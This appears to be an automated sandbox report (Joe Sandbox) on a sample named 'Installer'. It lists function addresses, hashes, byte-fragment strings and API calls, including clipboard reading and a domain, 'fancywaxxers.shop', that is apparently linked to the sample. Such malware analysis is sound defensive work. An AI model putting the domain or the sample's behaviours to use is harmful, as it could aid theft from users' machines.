Opcode Fuzzy Hash: 7b9032eb4bd35f5e3d99bba0af72f4c1c4d58ce44e2f89bcfce13bf7f176a502
Instruction Fuzzy Hash: C2D1017251C3808BD7248F29805036BFFE1AF96344F18896ED4D5AB393D379C80ACB96

Function 00429670 Relevance: 10.4, Strings: 8, Instructions: 410COMMON

Download Yara Rule

Strings

0D5J, xrefs: 00429AC2
!J, xrefs: 0042978A
Y\, xrefs: 00429782
'H(N, xrefs: 00429ACA
2P<V, xrefs: 00429ADA
2TUZ, xrefs: 00429AE2
U+, xrefs: 00429772
/V, xrefs: 0042977A

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID: !J$'H(N$/V$0D5J$2P<V$2TUZ$U+$Y\
API String ID: 0-2694607278
Opcode ID: 25e0d3bc89c5feebe81d5c29e0cea231420b6ea0bd3bd3fb51de3ac3bb5c88f8
Instruction ID: 1ac6cfbdbea3fb0166e41acbebff7f1393d1a17534bf7665ae23410c19831d56
Opcode Fuzzy Hash: 25e0d3bc89c5feebe81d5c29e0cea231420b6ea0bd3bd3fb51de3ac3bb5c88f8
Instruction Fuzzy Hash: 9CE103B5209340CFE724CF25E891B6BBBF1FB86304F544A2DE1898B2A1D7389845CB56

Function 0041A8F0 Relevance: 9.6, APIs: 2, Strings: 3, Instructions: 884COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0041ADC7

Part of subcall function 00442EE0: LdrInitializeThunk.NTDLL(004462CB,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00442F0E

FreeLibrary.KERNEL32(?), ref: 0041AE04

Strings

I^, xrefs: 0041AC9E
I~, xrefs: 0041AC96
r{, xrefs: 0041ACA6

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: I^$I~$r{
API String ID: 764372645-3947438656
Opcode ID: bf9e9b555bdfee25ee08b43b7f11e88ad01a93ed04d2f55229d8ed019cbc9ee5
Instruction ID: 01d10e7787a4631e60205b4b194827228a4ca0f1996a3436fac5a873df22c0aa
Opcode Fuzzy Hash: bf9e9b555bdfee25ee08b43b7f11e88ad01a93ed04d2f55229d8ed019cbc9ee5
Instruction Fuzzy Hash: 216219742083009BE724DF25DD4076BBBE2EF85314F24862EE1955B3A2D375DC96CB8A

Function 00415BA0 Relevance: 9.2, Strings: 7, Instructions: 433COMMON

Download Yara Rule

Strings

?A!C, xrefs: 00415FDC
(]?_, xrefs: 00415FFD
$Q7S, xrefs: 00416008
TU, xrefs: 00416013
%E:G, xrefs: 00415FE7
xY[, xrefs: 00415FF2
naA, xrefs: 00416168

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID: $Q7S$%E:G$(]?_$?A!C$TU$naA$xY[
API String ID: 0-4025377870
Opcode ID: 5b1af31a811106828254fe63f494c39b45190b2813ed431d95a7c1545a3e6497
Instruction ID: 001f5bf3ad3b7359d107e140a27ced6076e8ce19b5bd3f69ef3686efef87c443
Opcode Fuzzy Hash: 5b1af31a811106828254fe63f494c39b45190b2813ed431d95a7c1545a3e6497
Instruction Fuzzy Hash: 35D1DEB4508740CBD7249F24DC91BEBB7B1EFD6314F04492DE5898B3A1EB389841CB9A

Function 00438A00 Relevance: 9.1, APIs: 6, Instructions: 128clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00438A22
GetClipboardData.USER32 ref: 00438A45
GlobalLock.KERNEL32 ref: 00438A62
CloseClipboard.USER32 ref: 00438B8A

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID: Clipboard$CloseDataGlobalLockOpen
String ID:
API String ID: 1494355150-0
Opcode ID: e65233d46411d2d693bbe1646db2b54a8d69f46908d3ff38525457bca6ae2f3b
Instruction ID: ef8bd7f09762d89d12810a956e612d186e0140fa3ff097530d94014580fdeec5
Opcode Fuzzy Hash: e65233d46411d2d693bbe1646db2b54a8d69f46908d3ff38525457bca6ae2f3b
Instruction Fuzzy Hash: A941D1B0808782DFD701AB78D44939EFFA0AB16314F04852EE48587242D77DA959C7AB

Function 0043169D Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 236COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0043184F

Strings

J+,,, xrefs: 00431878
%&, xrefs: 00431888
<+m , xrefs: 00431880

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID: FreeLibrary
String ID: %&$<+m $J+,,
API String ID: 3664257935-2903865021
Opcode ID: 46b73d0031d5d22602d103d69066319cd327fe990ffce511ba10d6781edfa6cd
Instruction ID: 06b551e60c4eb0d8c536fdc7b529d72bacf9ad5b21def5957288b1ff5d32845a
Opcode Fuzzy Hash: 46b73d0031d5d22602d103d69066319cd327fe990ffce511ba10d6781edfa6cd
Instruction Fuzzy Hash: F661497160C3819BD328CF28CC557ABBBE1EFD6314F18592DE4C95B392C739840A8B5A

Function 00428898 Relevance: 5.6, Strings: 4, Instructions: 609COMMON

Download Yara Rule

Strings

S;65, xrefs: 00428746
ZN, xrefs: 00428B72
):'$, xrefs: 00428835
,5./, xrefs: 004287D5, 004287F9, 00428864, 00428874

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID: ):'$$,5./$S;65$ZN
API String ID: 0-4129527606
Opcode ID: c84d49e1710277876019f632c4965ca08173074aad0d1393ac4813f2abc0b2b7
Instruction ID: 5de5f77346f9c3e8f7f5da0a94ac95c636e8f84cef949512cbafba2931c77865
Opcode Fuzzy Hash: c84d49e1710277876019f632c4965ca08173074aad0d1393ac4813f2abc0b2b7
Instruction Fuzzy Hash: FA12CF76E012268BCB14CFA4D8906BFB7B1FF85300F9984AEC8456B351DB385D45CB94

Function 00427100 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 235COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 00427230

Strings

Eq, xrefs: 0042717A

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: Eq
API String ID: 237503144-1439466809
Opcode ID: 67f9349162184a8bc03b86ccf2c48a661b1ae788edc2a86ff317f6c1da086e21
Instruction ID: d94a3bd5084ead8c8e95632ad16d1513918d45001364c6842ffd181ccd2253a6
Opcode Fuzzy Hash: 67f9349162184a8bc03b86ccf2c48a661b1ae788edc2a86ff317f6c1da086e21
Instruction Fuzzy Hash: FD7122762083549FD310CF64D88135BBBE1EBC9718F45892DF9E49B280D7B8990ACB96

Function 0040E579 Relevance: 5.3, Strings: 4, Instructions: 346COMMON

Download Yara Rule

Strings

0T, xrefs: 0040E840
VP, xrefs: 0040E855
(n=M, xrefs: 0040E760
fancywaxxers.shop, xrefs: 0040E9B5

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID: (n=M$0T$VP$fancywaxxers.shop
API String ID: 0-1076106489
Opcode ID: ac3577ccf0b5f84683a813668f73118277194633f1b7731c5f03099ce8013f2e
Instruction ID: bc65e217dd32c37e917d73992cb8f26b2910b07b45870e5d4907e1c6cd6cf662
Opcode Fuzzy Hash: ac3577ccf0b5f84683a813668f73118277194633f1b7731c5f03099ce8013f2e
Instruction Fuzzy Hash: DBC1E4B1200B418FD324CF2AC595B62BBE2FF95304F1889ADC4968F7A6D779E815CB44

Function 004429A0 Relevance: 5.1, Strings: 4, Instructions: 129COMMON

Download Yara Rule

Strings

ZX, xrefs: 00442AC2
YF, xrefs: 00442ACA
RP, xrefs: 00442AB2
$VT, xrefs: 00442AAA

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID: RP$$VT$YF$ZX
API String ID: 0-3367519395
Opcode ID: 17b3015530af6ddb7c543c437789f3931ad896e569697511896058e8192dc596
Instruction ID: f30e9962ddc1c1e326a4881ed9edfed8b5c10db9a088f63b8cdd49c5cd57e41c
Opcode Fuzzy Hash: 17b3015530af6ddb7c543c437789f3931ad896e569697511896058e8192dc596
Instruction Fuzzy Hash: CE415976D183509BE304CF29E85534BBBD2ABC2304F49C83DD8D49B385CA78890E8BC6

Function 0042C68E Relevance: 4.2, Strings: 3, Instructions: 425COMMON

Download Yara Rule

Strings

/p=v, xrefs: 0042C766
_\, xrefs: 0042C7BE
HN, xrefs: 0042C796

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID: /p=v$_\$HN
API String ID: 0-994060674
Opcode ID: 9d635f7f1281f2313adc299b7b5c566b74050ad1d789b17f786fe430d2cb4f1d
Instruction ID: 15395981e1b154ef4626e50b808ccdc8fa677f847204a5c638b774b1a1cf1c98
Opcode Fuzzy Hash: 9d635f7f1281f2313adc299b7b5c566b74050ad1d789b17f786fe430d2cb4f1d
Instruction Fuzzy Hash: 60D1CFB5A08311CBD320DF14D89176BB7E2FF81318F18882DE5C98B391E7799945CB9A

Function 004310BA Relevance: 4.0, Strings: 3, Instructions: 267COMMON

Download Yara Rule

Strings

04(, xrefs: 00431426
", xrefs: 0043135B
)I5M, xrefs: 004312D5

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID: "$)I5M$04(
API String ID: 0-1389332778
Opcode ID: c78f95563ace00afa19198b16a488fe3b1bf2fc344963dc11aaf7cec1e5ede31
Instruction ID: 88daa6d93223a84fa4f08f872f5986970dfb391773db3043bbd8bbd849706c8a
Opcode Fuzzy Hash: c78f95563ace00afa19198b16a488fe3b1bf2fc344963dc11aaf7cec1e5ede31
Instruction Fuzzy Hash: A5613B6020C3818BE7148F29849037BBBD19FDB318F28999EE4D5973D2C67D850ACB5A

Function 00431150 Relevance: 4.0, Strings: 3, Instructions: 265COMMON

Download Yara Rule

Strings

04(, xrefs: 00431426
", xrefs: 0043135B
)I5M, xrefs: 004312D5

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID: "$)I5M$04(
API String ID: 0-1389332778
Opcode ID: f04cde4aa0ba57a2353e229fa49b6d71e0e75f5b7b2f45e6f8fed27d026178d9
Instruction ID: 5dcb8d078e4b22f696ac671710f4d52b8c837f8a410c3da8fcd2c9e588e1543f
Opcode Fuzzy Hash: f04cde4aa0ba57a2353e229fa49b6d71e0e75f5b7b2f45e6f8fed27d026178d9
Instruction Fuzzy Hash: 65613A6020C3818BE7148F29849036BBBD19FDB318F28999EE0D5973D2D67D850ACB5A

Function 004311C0 Relevance: 4.0, Strings: 3, Instructions: 263COMMON

Download Yara Rule

Strings

04(, xrefs: 00431426
", xrefs: 0043135B
)I5M, xrefs: 004312D5

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID: "$)I5M$04(
API String ID: 0-1389332778
Opcode ID: d53cb304f2f7cfc49fecefd1074142e141e2884579164cf6ad2c018f9d929dc2
Instruction ID: 0e13bec8c428417e1eec371e239b8049ae11b4e05f928df3fc91905b3686f9f5
Opcode Fuzzy Hash: d53cb304f2f7cfc49fecefd1074142e141e2884579164cf6ad2c018f9d929dc2
Instruction Fuzzy Hash: 25614C6020C3818BE7148F29C49037BBBD19FDB318F28999EE4D5973D2C67D854ACB5A

Function 004311B1 Relevance: 4.0, Strings: 3, Instructions: 239COMMON

Download Yara Rule

Strings

04(, xrefs: 00431426
", xrefs: 0043135B
)I5M, xrefs: 004312D5

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID: "$)I5M$04(
API String ID: 0-1389332778
Opcode ID: 112561bc02ef524550a8a2734e305f4042aa434cf04125222d1914b06a90428f
Instruction ID: 4e6fcf0c605a44f6db17a82f673648063e68d92a4ec56e148b2773195bd28a79
Opcode Fuzzy Hash: 112561bc02ef524550a8a2734e305f4042aa434cf04125222d1914b06a90428f
Instruction Fuzzy Hash: E251296060C3818BE3148F29C4A037BBFE1AFD7318F28599EE0D557392D679850ACB5A

Function 0041C079 Relevance: 3.9, Strings: 3, Instructions: 188COMMON

Download Yara Rule

Strings

?, xrefs: 0041C0B5
=>=", xrefs: 0041C22D
51-", xrefs: 0041C215

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID: 51-"$=>="$?
API String ID: 0-2657603097
Opcode ID: c805f1b0b4743857e9f7da9e608faec44bb7100d6bfc13ecc632ad2f5d0ececa
Instruction ID: abe61c85b96632bd74c37d8c5f1787647cda390835a3c9a37847f1dd2440e736
Opcode Fuzzy Hash: c805f1b0b4743857e9f7da9e608faec44bb7100d6bfc13ecc632ad2f5d0ececa
Instruction Fuzzy Hash: FD51037555C3808FE714CF25C8947ABBBE2ABD2304F48996CE0C19B286C7B9C445CB87

Function 0043F2A0 Relevance: 3.3, Strings: 2, Instructions: 799COMMON

Download Yara Rule

Strings

DE, xrefs: 0043F899
5N, xrefs: 0043F9FC

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID: 5N$DE
API String ID: 0-2043625159
Opcode ID: 56d6ab719762ac1ddd078ba46e7c95a81bdd69bdfcab1da4a84728f9e7cd3524
Instruction ID: 83aa22a50d27ce0e7621e4d1e47ab5a7a3487068b2e759fb74d055592eeab4a0
Opcode Fuzzy Hash: 56d6ab719762ac1ddd078ba46e7c95a81bdd69bdfcab1da4a84728f9e7cd3524
Instruction Fuzzy Hash: CC42323AA183118BC7149F29D89136BB7E2FF9A324F1AC97DC484873A1E778C945C746

Function 0041D510 Relevance: 3.0, Strings: 2, Instructions: 488COMMON

Download Yara Rule

Strings

bc, xrefs: 0041D5FA
xy, xrefs: 0041D89A

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID: bc$xy
API String ID: 0-4248330119
Opcode ID: b23a3f66dd391eac7994c44d81ce0ea2c8299881f36ba2bf512cdeee6f0c6840
Instruction ID: 8cb5c90ee0683dd14a4d3f13ba8741cb9397d3f9fe31891cc7d0a66556a588b2
Opcode Fuzzy Hash: b23a3f66dd391eac7994c44d81ce0ea2c8299881f36ba2bf512cdeee6f0c6840
Instruction Fuzzy Hash: 43D1D1B1A183108BC314DF28C8917ABB7F2EFC5318F18891DE8959B395EB78D945C786

Function 00444C10 Relevance: 2.9, Strings: 2, Instructions: 449COMMON

Download Yara Rule

Strings

"PD, xrefs: 00445012
C:, xrefs: 00444C55

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID: "PD$C:
API String ID: 0-2152004819
Opcode ID: 180c18709d0719a79b5cbf3ea4b56d75dd592a389bfa211a0234286fb112737a
Instruction ID: 284c632e66a7de604f80d28d8d54ecff75fbfcb872d88c2d904d20af7ba505c1
Opcode Fuzzy Hash: 180c18709d0719a79b5cbf3ea4b56d75dd592a389bfa211a0234286fb112737a
Instruction Fuzzy Hash: 32E11639618350CFD708CF38D99072BB7E1EBDA314F19897EE98697392DA34D8098B45

Function 004150C0 Relevance: 2.2, Strings: 1, Instructions: 977COMMON

Download Yara Rule

Strings

NP,?, xrefs: 00415500

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID: NP,?
API String ID: 0-3110377521
Opcode ID: 9f1a0676bfc2b65899916276d61842e796911a4754c7f9424de8d8f66801ba0c
Instruction ID: 554654612073c2bd00a2c85a963b7777b95985233acd87ed2237f2cb71550855
Opcode Fuzzy Hash: 9f1a0676bfc2b65899916276d61842e796911a4754c7f9424de8d8f66801ba0c
Instruction Fuzzy Hash: 71523274608700DBE7149F28DC527AB73E2EB86324F54452DF5948B2E1E778D845CB8A

Function 0042A630 Relevance: 1.8, Strings: 1, Instructions: 563COMMON

Download Yara Rule

Strings

GD, xrefs: 0042AE61

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID: GD
API String ID: 0-2404404916
Opcode ID: 922d48a5947f8ebdf8945f941db60658dda59deafef08b1edad3c93e38a0ab6e
Instruction ID: 3ba121e27a7464dffd3a699b93bb5f5e537d44a7f8c95b1b1a35ae04c2d85d7d
Opcode Fuzzy Hash: 922d48a5947f8ebdf8945f941db60658dda59deafef08b1edad3c93e38a0ab6e
Instruction Fuzzy Hash: 2D0213B46083508BD714CF24E89126BBBE1EF96304F18493EE9D58B391D738D95ACB4B

Function 004223E6 Relevance: 1.7, Strings: 1, Instructions: 466COMMON

Download Yara Rule

Strings

|r, xrefs: 0042255A

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID: |r
API String ID: 0-3724239489
Opcode ID: 4cbd05ccb661e34b9d51f29e164992bfd823dc87c791f75edab98bc9514db7d4
Instruction ID: f77bbff603927ece38dcee4d424ac586a01b912e6d32be68ba42e33c31f72565
Opcode Fuzzy Hash: 4cbd05ccb661e34b9d51f29e164992bfd823dc87c791f75edab98bc9514db7d4
Instruction Fuzzy Hash: 78D178B2A007128FC724CF24C992767B7B2FF95314B58865DD8929F7A0E778E801CB94

Function 0042F6A0 Relevance: 1.6, Strings: 1, Instructions: 388COMMON

Download Yara Rule

Strings

", xrefs: 0042F9D8

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 40379b3b7a8f1996759dfe97b0f887f764e29d7638f0e749bca7240099d60e0f
Instruction ID: 40a0d333b8a5ae2adc1b001fdcd7fb89c18a106307afca38ce0b0c8757936874
Opcode Fuzzy Hash: 40379b3b7a8f1996759dfe97b0f887f764e29d7638f0e749bca7240099d60e0f
Instruction Fuzzy Hash: E3C106B1B083246BD7258E24E450B6BB7F5AF84314FD8853EE49587381E738DC49C796

Function 0043EAD0 Relevance: 1.6, Strings: 1, Instructions: 370COMMON

Download Yara Rule

Strings

NP,?, xrefs: 0043ED10

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID: NP,?
API String ID: 0-3110377521
Opcode ID: 2b9ac5b908ebe96dedc2624e873c6625181bca0a93219ff02f6a5ab604879a26
Instruction ID: dc4e338d2792a9e85ad10e1b15e840570e97d8123b016deb6fe7eac2c3cc7613
Opcode Fuzzy Hash: 2b9ac5b908ebe96dedc2624e873c6625181bca0a93219ff02f6a5ab604879a26
Instruction Fuzzy Hash: 81A136756053009BE314DF22C8C172BB7E2EBC8328F249A2EE4595B3D1D779DC068B99

Function 00409200 Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

`, xrefs: 0040930E

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 5f8e702d608278123c95473e23042b0ba992d51b3dbc1e3dff1e287a1d188759
Instruction ID: 463915653b760c902326477b436916713c5e743ad202c61e7eb18b21ac700e84
Opcode Fuzzy Hash: 5f8e702d608278123c95473e23042b0ba992d51b3dbc1e3dff1e287a1d188759
Instruction Fuzzy Hash: 7061AF6018D3D18AD3118F35949035BFFE0AFA3358F185A6DE8D51B382C37A890ADB67

Function 0042FB40 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0042FD3E

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: dfab50682000b419ea20a1441f51e1b5cf60502763b2e55c1df9dc3eadc68850
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: EE71E732B183254BD714CE29E48031BBBF2ABC5710FE9857EE89587355D338DC49878A

Function 00407640 Relevance: .6, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89e0e0c8a8f7b7f60ff6657b1ae21f1ea5b816d1cf29eae59e5aba926e366c5c
Instruction ID: ce87272d52cbe1a5a0b5ef0ccfa1867683deef4e432db2c2ce341a58b0b69fb4
Opcode Fuzzy Hash: 89e0e0c8a8f7b7f60ff6657b1ae21f1ea5b816d1cf29eae59e5aba926e366c5c
Instruction Fuzzy Hash: 06228132A0C7118BD725DF18D9806ABB3E1BFC4319F19893ED986A7385D738B8518B47

Function 0042C006 Relevance: .3, Instructions: 291COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2db85d3b8cafc2f12cad9fd99eac2263cc895d6455a3a8789caa3a8c26eab8e2
Instruction ID: fa3138291ab7eee7bafac9d04551f2820df6d797534ad9472a562aa9b83c971d
Opcode Fuzzy Hash: 2db85d3b8cafc2f12cad9fd99eac2263cc895d6455a3a8789caa3a8c26eab8e2
Instruction Fuzzy Hash: F7A1AC7265C3259BD724DF18C05039FB7E2EBC5308F05892DE8E92B791D7B986099B83

Function 0041FD70 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 838994712f8301802770d5a3ba9cfdeb956b34d252de8da315c07417c0774330
Instruction ID: 51896704639a4cc1f725e99550202757941d42f1e4cd8935be281f977c3f9d9b
Opcode Fuzzy Hash: 838994712f8301802770d5a3ba9cfdeb956b34d252de8da315c07417c0774330
Instruction Fuzzy Hash: 8F6148356083905FC3258F29D880A6A7BE1AF96314F0882BFE8D84B392D675DC4AC756

Function 004296AB Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b78a67225f0ff1aaedcf4193328401902f4751f8219e37ab98aedf65dbd7aabd
Instruction ID: fc3fbd60eec558a8a12180bc577d63112baeae34fd98d04c390aaa22a0c364b6
